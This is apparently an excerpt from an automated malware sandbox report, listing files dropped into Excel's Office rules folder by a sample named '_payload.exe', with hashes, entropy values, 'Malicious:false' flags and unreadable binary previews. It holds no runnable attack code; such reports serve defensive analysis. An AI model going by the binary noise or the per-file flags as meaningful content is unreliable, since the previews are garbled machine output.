                                                                                                                          Preview:<?xml.D.q...D.,.@;S.).......o.s.....1|Nw:.>..e......I. U.\...#.......]..L(.E j.Zb.V..@.Uq.x.......my.m....PK.z.....B..tc..~.Na.V.-../>)~."...!.>'..}(...*O......1......W.Zq?'.#....Xu......8.._..jE......D#.m......]PUu..j4...nn......L...Nz....#....d..}..&.p.ExE.>..;-.Bp./.uh../Q.= 7.y.......(N.D....*....G.b..Jo*$GTu.+a.....G..J;..;.T..*..x.z~....7..M.....e...X.S>Nc.S0....AK..v..Av../,..U.0.a...1.LZ...a.......>th.W....].V.=.k......:....E+./...3H.<.......P.L5.Et.T..."l.....6p....1..2\=..Yf6.<CR....N.<S...B...m.CC....v.6>.s1G.)D&....#...&.A...:.j^Qv.5d...}E...{!.\..i2.m...{...yEO...a..!.@.F.\bJ.(D.fQ...>.....g.9....dh....*...an.N..T,..:m..hS..Y.@..mt.it>.....KiY..V.g.,..2&.........@...L1..t.G...3..z..9;.U~9....kQvK..D@.\#..x.E...z.....IP.k...s.TU.z/.?x3..S...<...!I0RH..G.........b....9/5V[RL\..*Sq.6:.?..2X`..&q........."E.l.K...........(3cb..a../...3&..k.po.?..tH..c.o.x.DR@.*.z._BgYq.b../{..0PU....].}.@....,.W..H.1J....u.@N.].E/3

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63057v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2512
                                                                                                                          Entropy (8bit):7.9189576933710555
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:feJY0vQYuJNDMOQjL5ZAkBmfmm9sBFlo6mpKI9eN0stpg5D:2W0vXsNzkZAkkfmm96jqpl9eN0sHgx
                                                                                                                          MD5:D41855F364D1A89885088EB73F432AFE
                                                                                                                          SHA1:7B5004E713B9020E4FCFEFC2ADFC088E8B9A2E92
                                                                                                                          SHA-256:293E1DFDBEB7FA415456ADA1A298C115C41A0FBCB39821FC407DAA2EF4A328FD
                                                                                                                          SHA-512:6D01C8144791E7BF52535A85977ABC12B2BBAF5D50FC1D8FCB50857AF8FF75A9E21D717B708BE91C323A525DFC6D5227A4C49CD4F87CD794B64CBFA687AC0B3A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....?%r`.*.E....db..:O....d&.$..^+...h..u.A.%..'....2.....f...6...c~..A..T.A.=.kA...1.nfD_....OD^......eUK.....'.y..f.G@CYA.S2+V..7...*........hO...I.....=.*.'N...APF<r.Ls..H...'...8...v8....a>.IG.m.XT.A.,.D..2..w..|.z1p-..%p^x.T.^?..<,.q....t..y..Z..D.}..M...D.......V.=..._{*3'....f7....hla......is..Q...0@...4..../.p..........H.!..K......7..........H.N$09}......`l..a/...n..5..Y..74}B.+_...^...J.y.k+..... ...m!Eos.#.8......KXiu..e....... E..H"..."E..P|.....[.+.....G....2.JC..LJt..3Yc.L..a.H9...k../)...8.>.....I.M4.7Eey.g.m..C....9....-gBW...].9...l;('.>.U..91Y..h.3.E.~..7...MX.M5.m...Wz.ax.yn...p.^j......."i...pv..c..M..4t.4.[.H.....6..>.k|..X.Y.a.I)...K......;......k...pZg.F.h..u....4P.,.R'............~....X[...+6._).J..Q..f.g..O..ez8..T.68...F.W.v...3.......i.....#0.2...Q.I1hQ..Z..kN.....Tr.........^;p.&.fRdtn&.{kV...?..0....C...BO.90AB..(..J..<..K_a..@....@..z.....W{6.-....#z..C..`.f....3..<E6...^:..KY.d.r......*..gw..f.s.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63058v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1247
                                                                                                                          Entropy (8bit):7.849043820092956
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:OMieL4/BIfj/L6K27pr2bTjpwRBBzrcWg4yQa8f3dpCLvvGX8hfzlCjS/W/Tle1e:FAEj/k6bnp4BBteJKdQDG6Ll1/443jFi
                                                                                                                          MD5:E91FB6C5C467A7921E5FEF9247B1584E
                                                                                                                          SHA1:B3EA178101DAF3E537F763FD0ED32A238DFE2B36
                                                                                                                          SHA-256:63C216AF09E6547C3C6A5A3CFF25EB3A8CCFD1D0F13F8E7A54DADA3CBF82561C
                                                                                                                          SHA-512:5996711F9E8FFED9C66E4F5331C3ED14F9A251184CB98128E7088B5273390225E37443844BBB0891E487D7937909FAD629EB04CE903892E69EB4127AACC2341D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlV-.;...z.Z...)l2.n....6D.....O...n....s.......J..M...K....\.p....M...C.>.y....X..H.J..#.~.y...q9.(....P..a..#&.W.g...Y...P[....{].@..2_.....+f..)..=w".R~{3gD[.(B*......K...{.-.g...:"..P.M.{....~..Y.\..&.{i...w...wW.....cRrX1..Ur....a...9.....Ib...!]..!.3....^.R.......Sc7..IZ..S/.=N..e..*.5<..K.........z.h..n.7..CX..e.E.^s.P.......}3..N.c...-2...V... ..d....{.4.{P.M}.+F.9o.f...U.......yV........u.....#{.\.!U.b.4.Zu&.LV.N........o..:?"...0..7,..[%r...UD......H...L...ws...k....R.#...z...H..z...v...u....k$P..W..>....u...RIu.....D.VL4.dw)..Wj...n.{X>.|..P..OL.!.6..C.4..%.RZ.H..+@s..q...u.|.=.3.KA.a@.Z...f.o......0...J...tH.........'*k .E...... ..<.Fz!../n..#..%l73.6.l..l.S.s.....L?lb....;.P..,5..7.J[..Te....W0..............1^y....hG....U+..t......=.....-..3....?.p.H........ .9......Rc[...P......:V.=....]$$....P..;.%Mrc"....."U..E"%.L.>{..L.....1U...;...:.l!V.[B...:.$.........C.(../._....=..bL.@v.f....F.N.'.].@G.o......M*...z6

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63059v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):950
                                                                                                                          Entropy (8bit):7.784930493908263
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YNRq4BLNkzf3jKS/oFsuCuslCk4j2t79GlTRSaru6z+FbD:YDquLNwu3k4kONSaYVD
                                                                                                                          MD5:0ADA91FE6658BB56E3FCFBF70235226F
                                                                                                                          SHA1:08B27AC22C05FB29C50015D9D2026E1E9E813996
                                                                                                                          SHA-256:F80962ADD58E741273746587B9E4AA15CA7216DE3407CC5904727A12C2B242B5
                                                                                                                          SHA-512:7BC1AAAA55EAA16428521626203F5FF59BF85F70C851831422089A465CA88163999BCC728868C0C9C11253B21265253B63AB5DD65626BEA09D15CCB771914F84
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml~[.hn;.<....c....*............G%<.:K...O.aU....@.......c.;b!z7M..U......!{.x7..TL.v.--s.N..D...,..5V....K.M...>D6.E...@.j..u.....^+.|.....>S.....N..x..;..P.p.:..X.e4BYo.G.F..:`..|{fs<a^..L..|.f.,.c..nM...6.@b[.qi.c.7..<#.[.{v...x. O{O...".sk).V.k.L.$?S.#........$..M......J....._o...,....<..W.._.(...#.,...7.O.m...!.9.....C.cG.Sn.o/..q.d..a..F.....4....h..A..f.....I..`6...-<c..V..x.1....B0....[6.:..?....ue.b.@....`....6v52...g.^...1.e,..H.@o._("=.."..[.~.....v..NU..E...q..I...geS.oV..E.V......eg@.j.-.kK@...........[...a..K...4.Ec..G....a...$ ..t..+...B2....\.8.#^_..R%F.X)..@c*[.o.Y`..9.$.V..:R-..8....$...y%>.q20y.o.....R.n.%..............(gG...C.j.F.%;J.*..H.5K.@..........3....h@!*]....C*.D2..C.@:.7..3....n....=..Z....,.&..i.....!=?ey.KL..~.......(.~..=..J.....Z...+..S..`.I.H&]y-8..M.Z.....7.byjz......^_.. G..u....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63063v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1125
                                                                                                                          Entropy (8bit):7.8397406085086825
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:myaw6DVlXekniUYhlI2jajSgJamhhTD3/wrF6oaFrRIG7RmMx0GbD:1aw6DVN1iUWl7WjJamhpvwooaFdIuRmY
                                                                                                                          MD5:3EB7DC25C366F1B17D38587D5854BDB7
                                                                                                                          SHA1:78F2C6786618338A0D74B57C458BB9C7A976623C
                                                                                                                          SHA-256:7F5317075B6EA53D84680E2841C20BDC7255C80FFA33B55AE10F3910398BB5B3
                                                                                                                          SHA-512:B125591902B5C9F6A053439DD8EA52B9337A2E13DED0EAEB6FC3A23F5CBD903F4BA73BFAF71C675B06F3D9F13C4368C9445B3E5E93D42CCEE1CB74DDB127B49C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml7..g.....F .......*p....5../...Iu.[.D..N%.M.T......;........_..Yb..+.T.[........^...0.Z..X.......M..9..Jo.Ik..`P..s|..m...Ej.NbT....d..W$M.:6....\.....h..J{.....>U........$&..K....L#r.yL.\....vR..".!..+.~Y|ve..Uc]..~...).p/.0r....o*.E3....w.m.s......5il..Q...(.g.{f...|..-.x....s....xxG...1...Uh/.w.X.%.c.P.@]........Y...\J./.a+j.L.9.A......0..*#kD<k.G.+T.r.h....D..0..y.Md|\.L`........a.#.^.j]....}.~..zb....u...$...<..8.B..,...2...2..'.f}....Ex.iSh.,.8...._...L....rn.C.Uo........c"F..........B../.n...y...B...?_.;.....%5f.f.Q).|...s?..7... ...9.a..Z..1*+...0...7mj..q~K.% ...? ... ..M...!...=z.G..u3.....12..8....O2.`_...Q;..........f...!.....8...#.?....A..)..&bjqV.0....,.%...^8aC..n..}..Q-........S..B....Q..g.+TbFX.G?W...;^..r..]r.+j....O".....B.*..H........]}5..n.L.1P.Y..;.P.M`6...VeP5.$.?...T.nD....P...8.U...@...cm....^...Wz\......"R....iZu\.....;A..`.q...9/. .~[@.,...{...j..?Y..e..=...&Q...a.iP....T..zF.../......;2..a.A.S.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63066v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1121
                                                                                                                          Entropy (8bit):7.822255385241012
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:pPo+wlV5GNn4yPX8E5xhRU9716ae5OFQ231HRGGDbD:pPo+i5GNn40Zh2+aVj3NoKD
                                                                                                                          MD5:A0C165950876FE81A959CDAACADDB2A7
                                                                                                                          SHA1:00B4314F4F141DD1AAB51B9FAE3A354E00EF77A3
                                                                                                                          SHA-256:775EBFCF61700A01BE36C2AAEB73E7B711361CBA28286D7B080C862BCB6092B5
                                                                                                                          SHA-512:CDC570E46F6E1992FC2E6C0774E6E154320853E090A2EE836C9815A1F2831F2B336A7950EEBBAC8D761A336F5C8C678AEB48E5DB179D04EFED64FD2A69F23B95
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.X.,...../.K%.D.m.$..........\_j../ie_.VdI....~c....S.$<e........'..P.6.J.ac..^.%....f>.bv5<.A.p.$..s...j.....J....b.'.M..M$.$.._...W1....JX'..C....7.....^Rz.. ......b.j...$X..9}c..>..V.#.7.r.e<!D..s.m..Y,x./...t.9g.u. N.P...$.4..........y.=.....=.......-p..S...$......y......`#.......c.I.-n....d.R`l..`..%..U..Ri#.":.C...o....9=...?....sd........yu.Ur.3..'.a..\;..$0.....C${...cG...!,..........^................sEd&.65.H;X....M~r*>.<........`}..Z>..@e.....P..v......8..e..x.$:....NO./..e$...iQ..O........e]..5...p..%....f...9...8..X.,.....e....h..l&..tbQ......7a......:.![...9V....3c.'r.r......"vgj.9.)....).%....P]q.>...Z...)Xr.*.R...G.n.&...c....\D......=....c.]....T.|..D.x.z~..&...,...mv+...l.r.e@.;.Xp..........5..y..^....5..../...+B.~..4].f.'....f.M4K...@.I<XT..1.9...c~s4....}.....G.62.b.J.\....J...B.H....._...M.Y.....*..sQ.r:...X.3M.7..3.j]`sr....)t2.o.l..........0......Iq..s.+..7...T..s.....|......{...E.I`a-........&.......iTg

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63067v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3109
                                                                                                                          Entropy (8bit):7.935154678169942
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:QjvKwOtUu6DBCxh+uB38f/hhvF8Oe6W0k7L:YI0kxsxsL
                                                                                                                          MD5:88FE98DE3151AD75FF5072EF8060B87C
                                                                                                                          SHA1:7BA18F59B70481248DB15B95A36F99FB7BCB119E
                                                                                                                          SHA-256:63A256A41FE6B8EC9A3A54ED0286C8711BA6263515837992A473BE23032FBE9E
                                                                                                                          SHA-512:5CD98330780E174DE88AAF20DB7DEE25E69B3DC8E59068C30767D8CE99C63925BA90F3F548CFA8DD2F119668ADCF12DE0B21F165569B3975C7672CF6D801C020
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.)..r...KY.G..h.8...0.6T..Z'd..7....J..-..y.E.6*._........x..Z...4....eWX..q..e2+....a.x ........>.".t.wn.<..4..3.]..g....aa....n,....J...O8Ku.u...#...A.......i..... .!.<..IS3.K1`.........6.j@.y.z..._.W.....8D.s.....i..GX}.g3.gR@#...i.+...N.gX..e..Pu..z...X...\....cy...#.T..=s..{..Un.....p.Yv.......^.."s..........Z.2.".Tj./.....|...s.....,....>..a._..FT\Q@..i...7B.....lt."-.k...k....o.5.i..p!.i.b.a.:b.gY......;..W...):.E.(...^.kf...wE......Km......|...*....%..._....W.JTIc&.J.....q..lWL....l.b..>.zB..,([..V...1.W2..V..^o.X-..L+e..]'"....J]]...wMb.X.+.....2^.e.~?..........3......fj.:D $...MZ...L.:bD.>....W.P...7..D'..xW..&W..#.....m>l...P=...<..........B.*%...|..:.d._..`......Jr1...C.%...S.9v..4T.......'}M.sz..f...V1..-k........+..Q.R.L.L.8aD.5....Q.`...P..LOb.V..i.....,3..........v$......U_..!C-...u.K..9.........:.....Ch?(ny....@+...ly...D.>~...IE..>".6.<......./aw...a/q....p.~....5j...=.\..7...k.....z.\..l....t.3...'.qJ.~a.tQ

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63069v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2126
                                                                                                                          Entropy (8bit):7.903056214229636
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:jOZye6gd8ORBT8HT0p7cKaNXkETDQEOblSyogu92oILD:j6yKJcvNXkEXQEiSV9Tu
                                                                                                                          MD5:0F33BE594AB5171DA70920D84CF90F2C
                                                                                                                          SHA1:77C5F09C81061CD2605B4F640663593DE9C9630F
                                                                                                                          SHA-256:CAB4117CD8514C4BA768EC1B412E20BA8DBDBAD2E5E46726FC25C5C998C80AB2
                                                                                                                          SHA-512:847AD941A5AC13890A69FAE47165F5D9E341E134A2175FCA042DE7419B38689CAC33D8CABB1F3752C033E7FDB41EC8DCA08386D7AE0E969F1BB791037C87B407
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..#..Y+,.1.{.mYP$o....d.Q..d&..I...=CX<.f/.......%[%s....\s..1A*V.,9.G...3..@s?%Fc)...HX#..Z0.7.59@Z........v.E...p.....b.....i/..r.u&.Uh.M.<X.a...D..v*.I.}J..i}........S.h.A.a..I2f....3..q.K...'XT.dg]..I.......6.P5......v.j.h>..[...~.bq..|....@.m.M`...^.."..i/c..L..z...?...l9.+=...`...z.N........._.\.Q.}Y.2....mr.....@p.....w..*.../l.......2..s.....Uy./..!H..'...gA`A..=...Cs<j.....*W+..0.....8....\Yf...Z.]..{..L..P...#..L....5.#....L....%R...s3..-...s.:<.o.C.b=Ia...'.......p...6.@v.&SKV...~..L..=70.c..Y....=.o.=.hv......6gO.jX....).QQ...8..JAyo.U.C...Q|..Yn.Y..j....:....~.n.d..S.@ ..o..u.....x..Z.aF.sq.E...}.Q..m..K..;..b.fe^.6......f.|...Jn.$.~..S.....wD..7...c4).+..N..O.. ..*+_.K....EnY.Ti.Y..C. ........i..g(9K.....9.MC...F.U..:...&5.ybQ.C.r?..Z0.e_...J.1.'...G.`..<.....K...>|.i..3.H.XL.7FKu.7.....^^/+.....h..Q..4.I..2.;%..X.......-.<h..q...f..........WF...e....gCJ]p10......e....^.Z5...J}..O..8..Z_.jJ....<.._E.X..*..&....!R.....j9M

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63070v5.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1387
                                                                                                                          Entropy (8bit):7.845983229659281
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:O3orLMR6oG4B/Bx/Ho3gOpBj4ZVOlphWuT9Md3L9SQR9YTGjEnk74OtfbD:ZoGapx/I374ZVUph39iLjHjEnkBD
                                                                                                                          MD5:2A19C0FB9D9547CAD37CEFBC1A57EE8C
                                                                                                                          SHA1:7D8CA8599FE39703A7EFA4A129A82EDCC073B801
                                                                                                                          SHA-256:709D36596AF1FE36B6C7E0F1F535335B82B9C0F9A510C2F20C5EDE06190B17F7
                                                                                                                          SHA-512:9C741026FF78A43D2EC3AFDD8E6C3028D9833A485035224F6BBE6AEFD53F638B7CBB4C61DF4A13E978CD23A17F1680EF0F2C6CD8F219A990E1D9BC963EB2E960
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml7..nmp.U..kc.l.v+..e..{M .%.a%(...6.s.X...}...]!...j..h...".5..S..A...b.fJ.a7......2/..".k......_Y:..S.\..0.C..YPw:. .:Y-.z.iK..o(..5.i.d..r=._....!...\..u8qwy..?...91..m...kS.J..4..G......M).q.4...&."s........^P.v....$...NXj+t."gr......v.*...p...Jv...._.n......z.82qA.s..65.v.%`R.....i...;^.y.8...`.x...NEx....q..vW`e.l<bd..\x.t.".y.a.H......\ te..|.t>'fZw'6=...:......._...O\F...*.@.q.D..7s..a...Q(CD.g(.~..q.gD.e.y4....].......Qz.H.8N}"...N(r...P..$.v......>xv..8.C{@~.@...G.f.C,eN...eM....zm ..f/z...JY..q9...W..r.;p_.......9.....<...n&.5.W.Y.x.......%....=..mv.d.........U......o.X..7(..Z...R.R.-..pYM..m......1..h..)..z.K.1x4......=.mbD...S......PLu.%....=.....Uk5.EGSCw(..-Ms.c\.h.gt...`H4.#o......9;.F.E~...P3...I........s.....`ZGA....[m..E(-.+...wO....O..6...o+>....@...K...........F.)&..Y..[..2.#....,v76:.c....r...:E.8;...O...k.5..9.?..8.Ef{..F.3.0.C..Gt.|.~..Z%.K..".&.S.>%P3C.?...3d.../..vU.C...u.c..L.]7e..o*R@i(..Q..X.....p.....O.m.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63071v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):754
                                                                                                                          Entropy (8bit):7.715452491698501
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:sRSPXodPnrqmYNfTBn6ECFIgWCzWfdL6w2sfAmmaFtNls17Wi2mmEMq5bTcii9a:sRSPXodPnubfNnZKWfdLqOtC7WiPdbD
                                                                                                                          MD5:C36BE671476928ACDAC814CF7573C818
                                                                                                                          SHA1:E16398749CB473CE14148F53476C99C88CD2FF0E
                                                                                                                          SHA-256:ABC1EAA492F6CDEBC70AAB5CD515C81E6E87900707C3890ED2267848C0724529
                                                                                                                          SHA-512:0790E498C62D7529FE3789682A2DF6F06A0D6923D14D26A227FC166D7DBCA4B1A7B20259F2B842F10DD14847C7D1A2C91322E47A03EE19649C51566349992ACA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml'.....&.. ....Q.#.....ds.....<](F.{^....mN...yVQ..K]M.|..Y............'.RqBIz\.n0.]Y.KD0pmW...5\&........^..r. .t.f..........$|c...r.D.J.ZQm.............a; 1.0%.b.[.g..+64..{.".S.$.^.!.=..`.7...1....o..8.._U..Jf....hd.+.;...p..b...77.....1T..'...D......P.I`s}6...=......{.....ex.....s~...6..T..q.B@.HY.......Y.y....1......9.d...xQ..Gy]e.....mT.y.._..V'.c.*...m8.:Xz...,k.....f.>.>LT.>CxYt...k....!._.......o.V.c("eE-'...S(...8....0d.........@....l...!..z-...!...WEh..Y5.*ks...SG....d.7.Hf..[...|U..e...*ps.b...+..PV.,.-`.....J.7g...J$.l};,.....;...+o.A..N......N.*/..k..bc.uF@."2...wH.....9W|..I..=%...@../..P.8`Tf....{.;....L{..J..t...P...*.T.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63077v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1399
                                                                                                                          Entropy (8bit):7.873137052819473
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:5f3ey4z0btnrBJWRP7zZwKrE0YAUfNmG2Zpr6sL9rqAc0a2GWtJxlj23pQ81peRv:40bxBJeP7zefxfNmDZp2IrLDjx92ZXGv
                                                                                                                          MD5:22CCE85B94C13ECD3FE20861DB548375
                                                                                                                          SHA1:C2F9D11A9F425573E181878906B8AD750C81AF73
                                                                                                                          SHA-256:09FF6913C6CD1B29979BD63C2C6DAB267B68E51FFC30BCBC2F8DA3721182173F
                                                                                                                          SHA-512:DBF8A8C7647BDC081F8C9C827F4DBC5DFE7ED032F9D5980D7147F64791569FE5316449B35A5D60B49F41162212A3532E61A64D0D0B7831CB193F2529427249ED
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....K....276...2:...cq.NL*T.}o'.....r.\.d.....tsy...U......P3..[....p....4mjE.n...Ve..\.m./......~...v..d<kD.8m.{YJ.<@ih...JhM..&....6.r./].........6q...Q.......Ssvm=.-.l....TW........?......s....6O..e!.j^...8.>...:.f.Af4..d.....[N.... ..p@..QG$ja.|.;{...&O[..4.....b.....%"Q.rDf{.F.h._.4.=U.T+.5.e.5.8...s.....e...f...gf.T..jC...3U...i...8.@..k.<W$...g.l...q*..,..$... w.....&W.%......7.:..l...kA...........~L...V$.......s...R..o.Z2..':.5-.w..J..A.0..N9R..s..+?...r...3H..[Fw.........a.Q..n.>.E...D..OG>C......-.Z..g.@./.N..H.+.i.k{.5N..A '&C...D...;V.K.9s}..N..Q. #G.....C.d(A.V....v..XE;3g..eld..o.2...a.&u....t.$.fz..U.:..g1>B`...k.............~p8.A.....b'.L.......x..7.2."..F.L:q......[....#.-...0.<...d.`..6tN....d.}./...._Yd.<......~W..Io95V..3.....a.v,.F.%.9..?..Wk..9......)*HN.,..jqT..z...=........5!.${.L.."d....._.u.S......1...Rb../..w.v+........wcw..T.}.}.M..=.mi(!Y...~....w....v..]..UR.]o?>..K....-+. .#..D..t.<.4..%$.'.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63078v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):708
                                                                                                                          Entropy (8bit):7.681736065788106
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:3MJV+ZcHshuCFpah0gTK293FWvFvn2QH+DNGR8Br2zXJ7Hukq5bTcii9a:3EmQgu3TKCMFvn2QH+sSBr27J7uVbD
                                                                                                                          MD5:7D455439B3E0943CC0A5B94F3A47220E
                                                                                                                          SHA1:52BF3AD4F8DCF5CC93F2964E72EAC16019E63364
                                                                                                                          SHA-256:B8AF8EF3040445177F83754A4517D79C78F2FEA28F42DE0BC7CCD5CF2A072F5D
                                                                                                                          SHA-512:BF5D3DE924B45D246F57CEB241158357A83FC91B4590295800A2E006C6A5C057D8ED5E5E7CA4F3F26C09027E7CF418A3CC7610AF700ED6677EB05A218ABC8311
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......B.^.=..xf.......4z....0...d.....`"!:Q......E...,...5...._6.".3..d.L..u,.v;..k82..V.*.j~.4..kX........:iKIY.;'/.3.....b....l2n.9Y..\..^c...mf...}.........Y.W..O.}.....i.....2..g..#]h.L..W.w........T..&8;3S'..3.m..w..bB....<..PIA..Y.?...`.;...X.....|....V....S=.C...^..\.fA....74..g."k...d...t:.i^n..f..[....S.T.sl.Z.....F..&@..X$|.j:....qVU.@...-%....F.)gUmrh..x...W.`...c...X.'.^......PodF.XY...T..X.0.7<(...6...3.....1@.Nz...F4..w.m'.'H3.K.5{NR...G...B.p..CO..V.PK....n...Z1c...W..[GCS2b.....Jo'...~!$i.?...2:....2.) *-.Y.j/.?..NA.rW..2$.f..9......7I..7...>.m.+..."5..f8..y...Oq@....B.j..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65136v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1132
                                                                                                                          Entropy (8bit):7.842921191634768
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ieXYBDftH9OA0b4l3ZzX7VgGlCWFRii/fzTqVbc7m2Ot+4zxYbD:mBDd9OA0mxXBxCmxfqVbkm2nexCD
                                                                                                                          MD5:E4E5247BB79D417304B5C37905918281
                                                                                                                          SHA1:AEF1010A836C74E0723A00D164BF247895E21BAF
                                                                                                                          SHA-256:F0C6554BF7D256993D674420C54845329C3514C5728026AE961B74C6D5D11B9F
                                                                                                                          SHA-512:BB63AEDEFA186353EA0EF55ACD163449D8E2406ED8EDC1F51C74C2B2C867007D5E7056BFCF2D4CCFAC9218BE1FD06F87704E069789565C215E7B8729F413051E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..n.....$.,...\...au.Xy&.7.{..3.w.!.....w.H..F...|.).B..!..w....[.2..]?6..DI....*4'7.......\..K.....=[gR..8(.d3...5.5.O.v.|..<.85]G.YX...zy...S..5`....b.....}Jj..}.5.p......[.K........b.k..!.~...D+...b..b....&#;Y..dsM..H.^....B"."....F.#...M.VS.v ..u.S...../..P.7ZM.f.5......i. .5..'B...)$...]..p....|f.....n..qq3.*....wy*..b.(....|,ul..k._.j.j....zm.......2....A.?/.C.....;/..o6........".K..t.>...F4x.....1..@..n...eJ....i..2KC.5gu.j.`b.y."...O.x....JO.-......FI.\......rI...K._..e.r.q.d.#.}........2...sP..1..|.n.=..*FM.d8=0)i.cq..A.:5.W.... ."...r.}..U9Yl......;.u.....6..y.1..{.J..M..0:......V...]K......4.....W.K.3..qxN.~E...........'...1<...l.......T....y.SC ..n+n)g.....Ff..j...S.b.NN.">.........au.......&...-.@..B....Q..s..M.............]...+.r..l...N...'C...d.U..j..HzJ.o....c...#......i...D..1a..."./m[Q#..a.{.N..7z....I.R9..IG ...L$...W.F......($..%T.K.....+.....$.w..........Cj....k&..8...:..~..{.fWUj...I.F25f`{..N.|.x.yA....W+Zim.U.v

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule65137v0.xml

                                                                                                                          Download File
